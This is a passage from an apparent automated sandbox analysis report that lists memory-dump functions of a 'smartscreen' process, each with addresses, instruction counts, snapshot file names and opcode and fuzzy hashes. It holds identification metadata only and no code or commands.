                                                                                                                            • Instruction ID: 27629c5498f257d3f39053f46ff184fbb08320db44ab61bdbdc76f1745830223
                                                                                                                            • Opcode Fuzzy Hash: 22fcb8aafadc907cf4429b3ab6e086b6b281421009128fe4e7aa59c141c9d6fb
                                                                                                                            • Instruction Fuzzy Hash: B9E0656190B7844FC715AA3488698547FA0EF6720174A52EEC045CF1A3EA2DD885C711
                                                                                                                            Function 00007FFD9B8AAFB9 Relevance: 1.3, Strings: 1, Instructions: 29COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000001E.00000002.2188961968.00007FFD9B8A1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A1000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_30_2_7ffd9b8a1000_smartscreen.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: M
                                                                                                                            • API String ID: 0-3664761504
                                                                                                                            • Opcode ID: 2c04ba627061d28c29ce5c60626fd29d159405507c478a303202fca9577c8853
                                                                                                                            • Instruction ID: 263f1ecab61192de6a995d4bc8d66cb8c76d663368066db1136b6911208e8e48
                                                                                                                            • Opcode Fuzzy Hash: 2c04ba627061d28c29ce5c60626fd29d159405507c478a303202fca9577c8853
                                                                                                                            • Instruction Fuzzy Hash: 1DE0656150B7844FCB199A3584694547FA0EF6720174A52EEC045CB5A3EA2D9885C701
                                                                                                                            Function 00007FFD9B8A3B79 Relevance: 1.3, Strings: 1, Instructions: 26COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000001E.00000002.2188961968.00007FFD9B8A1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A1000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_30_2_7ffd9b8a1000_smartscreen.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: M
                                                                                                                            • API String ID: 0-3664761504
                                                                                                                            • Opcode ID: 9662a6f0a7edc4b4c64f0a28711b2642a6b50315399ebaa1afd990c2c15976a2
                                                                                                                            • Instruction ID: 3f61b9276bdcfe85a0c4d7b2c996db411421c38e232b899a6a3a3b0fc8ec33b6
                                                                                                                            • Opcode Fuzzy Hash: 9662a6f0a7edc4b4c64f0a28711b2642a6b50315399ebaa1afd990c2c15976a2
                                                                                                                            • Instruction Fuzzy Hash: 6DE06D7160F7C54FC71AAA388869454BFA0EF6721174A42EFC045CF1A7EA2D8889C701
                                                                                                                            Function 00007FFD9B8A28B9 Relevance: 1.3, Strings: 1, Instructions: 26COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000001E.00000002.2188961968.00007FFD9B8A1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A1000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_30_2_7ffd9b8a1000_smartscreen.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: M
                                                                                                                            • API String ID: 0-3664761504
                                                                                                                            • Opcode ID: e0e931b298ea436d0b3402fd866c73120f8f1541834c7ce07ba60a57d1942476
                                                                                                                            • Instruction ID: b7e7600cb1ce5b0d03deb82dccca8f86c1a059a0a8571b3deb35318874b4dc7d
                                                                                                                            • Opcode Fuzzy Hash: e0e931b298ea436d0b3402fd866c73120f8f1541834c7ce07ba60a57d1942476
                                                                                                                            • Instruction Fuzzy Hash: 1AE06D2164E3C04FCB16AB348868455BFA0EE6720174A52EFC096CB1A3EA2D8989CB01
                                                                                                                            Function 00007FFD9B8A8D09 Relevance: 1.3, Strings: 1, Instructions: 25COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000001E.00000002.2188961968.00007FFD9B8A1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A1000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_30_2_7ffd9b8a1000_smartscreen.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: I
                                                                                                                            • API String ID: 0-3707901625
                                                                                                                            • Opcode ID: 5476b5b955ca7212c6931c3ad42272a5885e2f67b914840ef1209d9df8880d59
                                                                                                                            • Instruction ID: 896374f14361d202d19b9e63f5f115d51dd669f848f8583988efdb471d3011ad
                                                                                                                            • Opcode Fuzzy Hash: 5476b5b955ca7212c6931c3ad42272a5885e2f67b914840ef1209d9df8880d59
                                                                                                                            • Instruction Fuzzy Hash: EDE06D6154F3D04FCB06DB74886A8047FB0AE6720078A41EEC045CF1B3E6198949C711
                                                                                                                            Function 00007FFD9B883F99 Relevance: 1.3, Strings: 1, Instructions: 25COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000001E.00000002.2188961968.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_30_2_7ffd9b880000_smartscreen.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: I
                                                                                                                            • API String ID: 0-3707901625
                                                                                                                            • Opcode ID: e53874bc25e98993b7da23805157a53e7daff7edb820a261e71af4820897e785
                                                                                                                            • Instruction ID: 77f5295326b8b8093b672075fe0c5723c3aa924f4833b3875b29add6fe0be65f
                                                                                                                            • Opcode Fuzzy Hash: e53874bc25e98993b7da23805157a53e7daff7edb820a261e71af4820897e785
                                                                                                                            • Instruction Fuzzy Hash: 03E0ED6154F7D44FCB16DB7488658443F60AE6B21074A41EEC045CF1B3E6299945C741
                                                                                                                            Function 00007FFD9B8AB589 Relevance: 1.3, Strings: 1, Instructions: 22COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000001E.00000002.2188961968.00007FFD9B8A1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A1000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_30_2_7ffd9b8a1000_smartscreen.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: I
                                                                                                                            • API String ID: 0-3707901625
                                                                                                                            • Opcode ID: 2ee88919ac1ca4b211d98a04b23072bfc9f10b694a8a521ad7f66b1e826bb53d
                                                                                                                            • Instruction ID: 1d3731bc69828d08ef363349f771d8598db7c125401b7acb80ca8ea47eec5bff
                                                                                                                            • Opcode Fuzzy Hash: 2ee88919ac1ca4b211d98a04b23072bfc9f10b694a8a521ad7f66b1e826bb53d
                                                                                                                            • Instruction Fuzzy Hash: 69E0E56154E7D44FCB16AB74886A8457FA0AE6B31078A44EEC185CF1B3E6299849C701
                                                                                                                            Function 00007FFD9B8A2949 Relevance: 1.3, Strings: 1, Instructions: 22COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000001E.00000002.2188961968.00007FFD9B8A1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A1000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_30_2_7ffd9b8a1000_smartscreen.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: I
                                                                                                                            • API String ID: 0-3707901625
                                                                                                                            • Opcode ID: 5cef69dda8ed1410be6685b3d643887a72678e3174d0996b250fee644651e0a4
                                                                                                                            • Instruction ID: 530f6c3c0d1d0106e70f666ce657ba592a8ecdd586e4ec849b90d632909f9d2e
                                                                                                                            • Opcode Fuzzy Hash: 5cef69dda8ed1410be6685b3d643887a72678e3174d0996b250fee644651e0a4
                                                                                                                            • Instruction Fuzzy Hash: 5CE04F7154A3C04FCB16EB7484A98457FB0EE6721078B41DEC04ACB1B3E62D8949CB01
                                                                                                                            Function 00007FFD9B8708D0 Relevance: .2, Instructions: 158COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000001E.00000002.2188961968.00007FFD9B870000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B870000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_30_2_7ffd9b870000_smartscreen.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 479c07689f6d0ded41d36259eb7f24cfd4f2537beaeda7a382ce55b0185ce5f6
                                                                                                                            • Instruction ID: ebacdbba36dd617fe2e0fc971faecc2e97a1875944c5612ec474694c3bb2e41a
                                                                                                                            • Opcode Fuzzy Hash: 479c07689f6d0ded41d36259eb7f24cfd4f2537beaeda7a382ce55b0185ce5f6
                                                                                                                            • Instruction Fuzzy Hash: C1414922F1C5294EE318F7A874A9AFD7781EF89328B0401FBD04DC71EBDD18A8428284
                                                                                                                            Function 00007FFD9B8A2F81 Relevance: .1, Instructions: 118COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000001E.00000002.2188961968.00007FFD9B8A1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A1000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_30_2_7ffd9b8a1000_smartscreen.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 1d450d095af819212d36d498b83f63b189c2ff2510e3ac84939126035bfc981b
                                                                                                                            • Instruction ID: 0ac3472bdfe5084435815c793af2f7624867681e1921e3ba3f24276daa02e161
                                                                                                                            • Opcode Fuzzy Hash: 1d450d095af819212d36d498b83f63b189c2ff2510e3ac84939126035bfc981b
                                                                                                                            • Instruction Fuzzy Hash: 2A317331A0DA5D8FE768EB58C865BF937A1FBA9310F0402BBD009D32D2DE286D4187C1
                                                                                                                            Function 00007FFD9B870C25 Relevance: .1, Instructions: 98COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000001E.00000002.2188961968.00007FFD9B870000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B870000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_30_2_7ffd9b870000_smartscreen.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 51db01a99d8b2e6f879a66e216b8545756dd73ad526deee5b9c1eef849d3c243
                                                                                                                            • Instruction ID: 09d0d99ff4f5674b0f3cee13b9793a57fa383243fc5f0b11afbd9a972658727a
                                                                                                                            • Opcode Fuzzy Hash: 51db01a99d8b2e6f879a66e216b8545756dd73ad526deee5b9c1eef849d3c243
                                                                                                                            • Instruction Fuzzy Hash: 81316931F1D24D8FFB26E7A898A55EC7B60DF85318F0541B7D008CB1D3D9382646A740
                                                                                                                            Function 00007FFD9B870998 Relevance: .1, Instructions: 93COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000001E.00000002.2188961968.00007FFD9B870000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B870000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_30_2_7ffd9b870000_smartscreen.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: f5f191126f81a5f6a24756e48a3192ab912d102f97ef6903872dcf6c144dd6fd
                                                                                                                            • Instruction ID: 47eef80eabb432ea7e6a0ddf84577582cd752119a4091605975a7fe89df20ae9
                                                                                                                            • Opcode Fuzzy Hash: f5f191126f81a5f6a24756e48a3192ab912d102f97ef6903872dcf6c144dd6fd
                                                                                                                            • Instruction Fuzzy Hash: BF210720F2991D0FE798F76C54AE77976C6EB9C359F4100B9E40EC32E6DD18EC424285
                                                                                                                            Function 00007FFD9B8A2D78 Relevance: .1, Instructions: 86COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000001E.00000002.2188961968.00007FFD9B8A1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A1000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_30_2_7ffd9b8a1000_smartscreen.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 4c210add13333a0fa940f7f2d495a0db16882580fe01d2d291684da648375a55
                                                                                                                            • Instruction ID: 38d9e1133bf063575ace5a7a95e1c9cc336b13f3120b1d62dcb4c1a97443af9b
                                                                                                                            • Opcode Fuzzy Hash: 4c210add13333a0fa940f7f2d495a0db16882580fe01d2d291684da648375a55
                                                                                                                            • Instruction Fuzzy Hash: B221F722B0995E4FF7A8EBE858B67F467C2EF58314F0502BAD40CC21E7DC2969894311
                                                                                                                            Function 00007FFD9B8711AD Relevance: .1, Instructions: 84COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000001E.00000002.2188961968.00007FFD9B870000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B870000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_30_2_7ffd9b870000_smartscreen.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 55a81b94f21635a51edc4d76b98043549beec9baf582b8bf900dc3c65ad630fd
                                                                                                                            • Instruction ID: 06c5f12a536a190dcb2c061778caf4f809df3affc5411c407c05593266584659
                                                                                                                            • Opcode Fuzzy Hash: 55a81b94f21635a51edc4d76b98043549beec9baf582b8bf900dc3c65ad630fd
                                                                                                                            • Instruction Fuzzy Hash: 27316531A0964E8FDB49EB64C8A49B97BF1FF5A304B0545FBD009D71A6DB38A940CB50
                                                                                                                            Function 00007FFD9B887E67 Relevance: .1, Instructions: 65COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000001E.00000002.2188961968.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_30_2_7ffd9b880000_smartscreen.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 96f8dada00cf73754e14ad0ad092117bf82988f5a0db13506c23d5282f6dabac
                                                                                                                            • Instruction ID: d0f62a03a512fa2989f49ca3c3278c1f1da64781a007e4c118f8c05c8b5549d9
                                                                                                                            • Opcode Fuzzy Hash: 96f8dada00cf73754e14ad0ad092117bf82988f5a0db13506c23d5282f6dabac
                                                                                                                            • Instruction Fuzzy Hash: C3216D70E0A95E8FEBA4EB98C464BBD72A2FF58300F1501B5C41DD72E5DE386A41CB80
                                                                                                                            Function 00007FFD9B8809E5 Relevance: .1, Instructions: 58COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000001E.00000002.2188961968.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_30_2_7ffd9b880000_smartscreen.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: c1be780b657c568a6036f8f155889318a10a5a995cb53696d169141e34713e9b
                                                                                                                            • Instruction ID: b92cbca939a7716a1564ff8a6129e681db4dcd13bff8ff70af6a06d7db0073ea
                                                                                                                            • Opcode Fuzzy Hash: c1be780b657c568a6036f8f155889318a10a5a995cb53696d169141e34713e9b
                                                                                                                            • Instruction Fuzzy Hash: 0A11E972B1991ACFDB15BBADE4948E837A0FF48335B5101B7D01DCA0A3DA3864868750
                                                                                                                            Function 00007FFD9B8809D5 Relevance: .1, Instructions: 53COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000001E.00000002.2188961968.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_30_2_7ffd9b880000_smartscreen.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: e3b313a973305628e6fe3838a96aaa3757b5b482a247e9aab7ba26cb2c08e22a
                                                                                                                            • Instruction ID: c262a7218b5e8b067baf160ec330c8c5886b092ca7ee4cf5a7e92e50301df430
                                                                                                                            • Opcode Fuzzy Hash: e3b313a973305628e6fe3838a96aaa3757b5b482a247e9aab7ba26cb2c08e22a
                                                                                                                            • Instruction Fuzzy Hash: E501B971B1951ACFD716FF6DE8958A837A0FF49335B5101B6D04ACB0A2D6385885CB50
                                                                                                                            Function 00007FFD9B870BB5 Relevance: .1, Instructions: 52COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000001E.00000002.2188961968.00007FFD9B870000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B870000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_30_2_7ffd9b870000_smartscreen.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: cd39705ce9ff7f3326e06fd565d96f26996cb222f864a86d62647fb5553f359a
                                                                                                                            • Instruction ID: ab1266f2a0bd418811c377c190ac304713ca4ca53da42d6272a2c091103eb9d5
                                                                                                                            • Opcode Fuzzy Hash: cd39705ce9ff7f3326e06fd565d96f26996cb222f864a86d62647fb5553f359a
                                                                                                                            • Instruction Fuzzy Hash: B9012861A1D02689E71A33E8F9AA4EC3750DF0532CB4841F3D01C8B0E3DD5865869255
                                                                                                                            Function 00007FFD9B870C40 Relevance: .1, Instructions: 51COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000001E.00000002.2188961968.00007FFD9B870000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B870000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_30_2_7ffd9b870000_smartscreen.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 61db63d07d069d50d9d0a164d5c9a4138691093f5365b0ca3b939cf7be36defc
                                                                                                                            • Instruction ID: b813985124c20337287cb74146779200b5055f06f9ba55f6de382a11e31f7aac
                                                                                                                            • Opcode Fuzzy Hash: 61db63d07d069d50d9d0a164d5c9a4138691093f5365b0ca3b939cf7be36defc
                                                                                                                            • Instruction Fuzzy Hash: FE11E531E1E28D8FEB12DBA888A409D7BB0EF56718F0641F7C044DB2E2D93827469740
                                                                                                                            Function 00007FFD9B8AE2C3 Relevance: .0, Instructions: 49COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000001E.00000002.2188961968.00007FFD9B8A1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A1000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_30_2_7ffd9b8a1000_smartscreen.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 1414f74579b5444aabd05e26af1d2c8097891b67386546fe246816dd2e790f0a
                                                                                                                            • Instruction ID: 391ae8b8d0be86de6a00fe785a46c71895cb18156c469008cb86adb34a371946
                                                                                                                            • Opcode Fuzzy Hash: 1414f74579b5444aabd05e26af1d2c8097891b67386546fe246816dd2e790f0a
                                                                                                                            • Instruction Fuzzy Hash: 71017131F0841A8BEBA4E6D8D4A97FD73E1EB98311F510536D009C3594DA28A9818790
                                                                                                                            Function 00007FFD9B870C48 Relevance: .0, Instructions: 45COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000001E.00000002.2188961968.00007FFD9B870000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B870000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_30_2_7ffd9b870000_smartscreen.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: ec01cadeb2469628d98c8e8d31ae580829899d300cddfcdc7f936ee50b8a9566
                                                                                                                            • Instruction ID: 2c5d8ea0512c16b3c65de828d05aa164c5675db6c2aef3e82038d7bba2d5b51a
                                                                                                                            • Opcode Fuzzy Hash: ec01cadeb2469628d98c8e8d31ae580829899d300cddfcdc7f936ee50b8a9566
                                                                                                                            • Instruction Fuzzy Hash: C001D631E1E28D8FEB16DBA4889409C7FB0EF46718F1541F7C044DB2A2D93467459740
                                                                                                                            Function 00007FFD9B8ABC80 Relevance: .0, Instructions: 36COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000001E.00000002.2188961968.00007FFD9B8A1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A1000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_30_2_7ffd9b8a1000_smartscreen.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 1ed31f4273e0e1cac4ed8a58b3aeed6f8b02bfd284086d299f0bce18b28a69b7
                                                                                                                            • Instruction ID: bbdff5030f93b66d1ee3964377348cc8611c3f21767b1a3933f24172ec5d28ac
                                                                                                                            • Opcode Fuzzy Hash: 1ed31f4273e0e1cac4ed8a58b3aeed6f8b02bfd284086d299f0bce18b28a69b7
                                                                                                                            • Instruction Fuzzy Hash: A3F05E21B0AD4E8BF698E7A844A67B476C6FB9C311F54417BD40CC31A2EE2869815751
                                                                                                                            Function 00007FFD9B87696B Relevance: .0, Instructions: 35COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000001E.00000002.2188961968.00007FFD9B870000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B870000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_30_2_7ffd9b870000_smartscreen.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 4291511b299f6ba97b064f841cd7bc85fbd4cd73d7dffe0bf2129c3ed7114f64
                                                                                                                            • Instruction ID: 670a5fc0be213ca85e0cff3f327ef4558f4569d4039a3fd09ee3546b4c4b3876
                                                                                                                            • Opcode Fuzzy Hash: 4291511b299f6ba97b064f841cd7bc85fbd4cd73d7dffe0bf2129c3ed7114f64
                                                                                                                            • Instruction Fuzzy Hash: B6F0E1759089188FDF54EF04C8A4F99B7E1FBA9315F014299D40DD7264DA34EE84CF81
                                                                                                                            Function 00007FFD9B8AB4F9 Relevance: .0, Instructions: 35COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000001E.00000002.2188961968.00007FFD9B8A1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A1000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_30_2_7ffd9b8a1000_smartscreen.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 254fd95697738ddc0942b148a56b28f98cd231f2d329d92308c29c968507a5ef
                                                                                                                            • Instruction ID: 110ba3575a131a1a7b5c8d976f2ad35f317dd534fdf4f4ceecc60d8f8494ccd3
                                                                                                                            • Opcode Fuzzy Hash: 254fd95697738ddc0942b148a56b28f98cd231f2d329d92308c29c968507a5ef
                                                                                                                            • Instruction Fuzzy Hash: D1F02B21759BC80FC719563D58650A17FF1CBAB10234A02EBD086C72A3ED14DC4A8341
                                                                                                                            Function 00007FFD9B8842E8 Relevance: .0, Instructions: 33COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000001E.00000002.2188961968.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_30_2_7ffd9b880000_smartscreen.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: ebfe231b17e603d1d48aa1383a59dbf35aab7cf8e434f66ada1d86f9eeca5021
                                                                                                                            • Instruction ID: 03a6ad977ac2ebf6ea77fe2545c67f932003246b30816814d9760d358a636d2d
                                                                                                                            • Opcode Fuzzy Hash: ebfe231b17e603d1d48aa1383a59dbf35aab7cf8e434f66ada1d86f9eeca5021
                                                                                                                            • Instruction Fuzzy Hash: 96F03C71E1891E8BEB24DB84D8549BD73B1FF94311F40413AD426D7298DB3469018B80
                                                                                                                            Function 00007FFD9B8A538C Relevance: .0, Instructions: 32COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000001E.00000002.2188961968.00007FFD9B8A1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A1000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_30_2_7ffd9b8a1000_smartscreen.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 33b70f5cfa4186ed04ca553d6ab88e0a68da43b7cfa1d5fe24ac9d2e8363b48b
                                                                                                                            • Instruction ID: c08e8ccc7b64e475a74ad8490ba67986879ae23a4065565752dc1b35dabb229e
                                                                                                                            • Opcode Fuzzy Hash: 33b70f5cfa4186ed04ca553d6ab88e0a68da43b7cfa1d5fe24ac9d2e8363b48b
                                                                                                                            • Instruction Fuzzy Hash: 42F03070A19A5D8BEB68EB5898613A876E1FB5C300F1101ADE05D93296CE35AA858B42
                                                                                                                            Function 00007FFD9B8A84C5 Relevance: .0, Instructions: 26COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000001E.00000002.2188961968.00007FFD9B8A1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A1000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_30_2_7ffd9b8a1000_smartscreen.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 9b4818441bb047532442b5f54e6e41404568fca61e7b8d99f10e9bd805115039
                                                                                                                            • Instruction ID: 1b97b534b39785a2eac3bab5cf492a31035277d2d08995e0880203da5c4f4ad3
                                                                                                                            • Opcode Fuzzy Hash: 9b4818441bb047532442b5f54e6e41404568fca61e7b8d99f10e9bd805115039
                                                                                                                            • Instruction Fuzzy Hash: 4DE0CD3574B5490FD70D573C8C354643790DB5A11678A00B6C449CB1F3D919DD4A8351
                                                                                                                            Function 00007FFD9B8A9118 Relevance: .0, Instructions: 25COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000001E.00000002.2188961968.00007FFD9B8A1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A1000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_30_2_7ffd9b8a1000_smartscreen.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 16150f9af1803047b0f2eb6d4bff8693afa04fdc0c6df28a7d36df8d90efe46f
                                                                                                                            • Instruction ID: 3b72a605dcf432f55a5db8c68d0c28b46d568995a1c6762bba4892f8d0ed8ab5
                                                                                                                            • Opcode Fuzzy Hash: 16150f9af1803047b0f2eb6d4bff8693afa04fdc0c6df28a7d36df8d90efe46f
